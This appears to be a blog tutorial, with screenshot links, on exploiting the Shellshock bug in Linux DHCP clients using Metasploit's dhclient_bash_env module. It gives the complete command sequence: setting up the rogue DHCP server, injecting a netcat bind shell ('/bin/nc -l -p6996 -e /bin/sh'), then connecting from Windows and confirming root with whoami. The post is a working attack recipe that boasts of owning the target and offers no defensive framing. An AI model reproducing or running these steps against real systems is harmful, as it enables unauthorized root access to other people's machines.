Step 1: Start Metasploit
Let's begin, of course, by firing up Kali Linux and starting Metasploit. You should be greeted by a screen similar to the following one.
![[Image: uCronQr.png?1]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uSNKACxt0fnlvcH1J_YFeDUwFoXBKTtE7cpJTyaBplAwwwfW6BRePPp_LmrDCTWGUgfD36xMr4o4haZFgtGC7tKmB5=s0-d)
Step 2: Update Metasploit
Since this is a new Meatsploit module, it is not in your Metasploit Framework when you downloaded Kali, so we need to update Metasploit. Let's open a terminal and type:
kali > msfupdate
![[Image: bJmKgN4.png?1]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_saok0OUTweoz-e3Yhf0rezKpRq6ReoMk8mUBhyBRMVOUEtlWxhofoHK5Q0pefLUcHHSuk0HIygvzWOzjringfXyHo=s0-d)
This might take awhile, so be patient.
Step 3: Find the Exploit
Now that we updated our Metasploit and presumably downloaded the new Shellshock modules, let's find this new exploit. In the Metasploit framework, type:
msf > search shellshock
![[Image: 1nmXbDC.png?1]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vCJzcg0AsVu13IXtDLEdqGE3s2T7jb_wzI4Td-jkR3ZTQObPGvX5ePqboUr0FuDmpvptx6xxfM0o3oQDDwpYJpZvo=s0-d)
As we can see, Metasploit found the auxiliary module for attacking the DHCP client using the Shellshock vulnerability.
Let's now load that module by typing:
msf > use auxiliary/server/dhclient/dhclient_bash_env
Now, let's type info to get more information on this module.
msf > info
![[Image: e2NsiXq.png?1]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vmF7C5_60ISBbUfiuHBD_9ErH5U0X5Dnlm8DeoN0oMrJMNaam-oy_iSY7vZjOHbB2nxHTbeKr_f4tYAq0WkhhYR4E=s0-d)
We can see in the screenshot above each of the various options for this module and some basic information about it. The key parameters are CMD, SRVHOST, and NETMASK.
Step 4: Set Up the Module Parameters
Now, let's show options.
msf > show options
![[Image: 5O1m2Ut.png?1]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uJmFo4Xv1TWetN61cds8S5DpRp7xh1ZWbkGWMpaOkx1sfDs0KsQm92-HPFHkxVWP9MykYyPr2SLijGwSrUV3PiCCTK=s0-d)
First, let's set the DHCP server IP. This is the SRVHOST parameter.
msf > set SVRHOST 192.168.131.254
![[Image: ZD8eR1H.png?1]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sMHRxdJF_B4_YlIE7RW__ptA8WCGdrQlTYzXcsH_LPNDYCRgTL5xMCYai-4u7zszFq-yAB9yuH7dm-JVa0BLn_kpmg=s0-d)
Next, let's set the code that we want to inject through the BASH shell. Although, this module comes with a netcat command by default, let's change it slightly with a command that I have found gives us better and more reliable results.
msf > set CMD /bin/nc -l -p6996 -e /bin/sh
![[Image: FQfpfmN.png?1]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vb_KrSTxJMZX8j_RQ8xx3NB3o0fOwKTFrMGzCBCyhw8NpKBkMPHnXETDTZ20uoDIv6jFFTMuQ5I3Z4PHACq2xNK8YW=s0-d)
Lastly, let's set the NETMASK.
msf > set NETMASK 255.255.255.0
![[Image: wb092wT.png?1]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uUJySnTrxgU7z0FNqFHHA3NeatHAm3gevcpdCiSoBPTOfbz0u4Fn_CrDIO1hbkINGyAEqMvsy7iZrfJA57ZWlJvY4=s0-d)
Finally, let's simply type "exploit" to run the module.
msf > exploit
![[Image: VaefWio.png?1]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tWuLh_BzK9Oozqy2zaYoqDf0HuHGqZLPArWNnyBpgDSUVmlX10agLUtMd6pD0k-4iqmgV5an8KY8ZbPGC7bihMxyt8=s0-d)
When we do so, we simply get the message "Auxiliary module execution completed." In our case here, this simply means that we were able to run our CMD line using the Shellshock vulnerability to set up a netcat listener with root privileges on port 6996 piping out a BASH shell to whoever chooses to connect to it!
Step 5: Connect to the Exploited System
Now that we have injected netcat into the vulnerable system, we should be able to connect to that machine remotely with administrative/root privileges. We would then own that machine!
For demonstration purposes, let's connect to that system with a Windows machine remotely by connecting to the netcat listener. First, open a command prompt on the Windows system and type:
c::\nc 192.168.131.129 6996
When we do so, it will return a blank line. When we type "ifconfig":
ifconfig
![[Image: PyQg2Sc.png?1]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_viJvu_grpHewDnJzONBvy1P57BgVDeuPLF_rv3zINWZVytAGAAqEJH2q9XA_76j0CBK9syKlLE3vsiIPbDH4vZvz9n=s0-d)
It returns the network settings of the exploited Linux system. Now, to confirm our privilege level, let's type "whoami":
whoami
![[Image: fxszA57.png?1]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vP-fEmBwO7G8wICG6mRG6-blWLUiz4qNKp9inl_xlOzGRSs0FVvnxUaG-6K3aiH6vKexULi7uO_bB53Z-U61PIbw9b=s0-d)
In this screenshot, you can see that we have not only been able to access the system remotely, but we have root privileges. We OWN this system!
No comments:
Post a Comment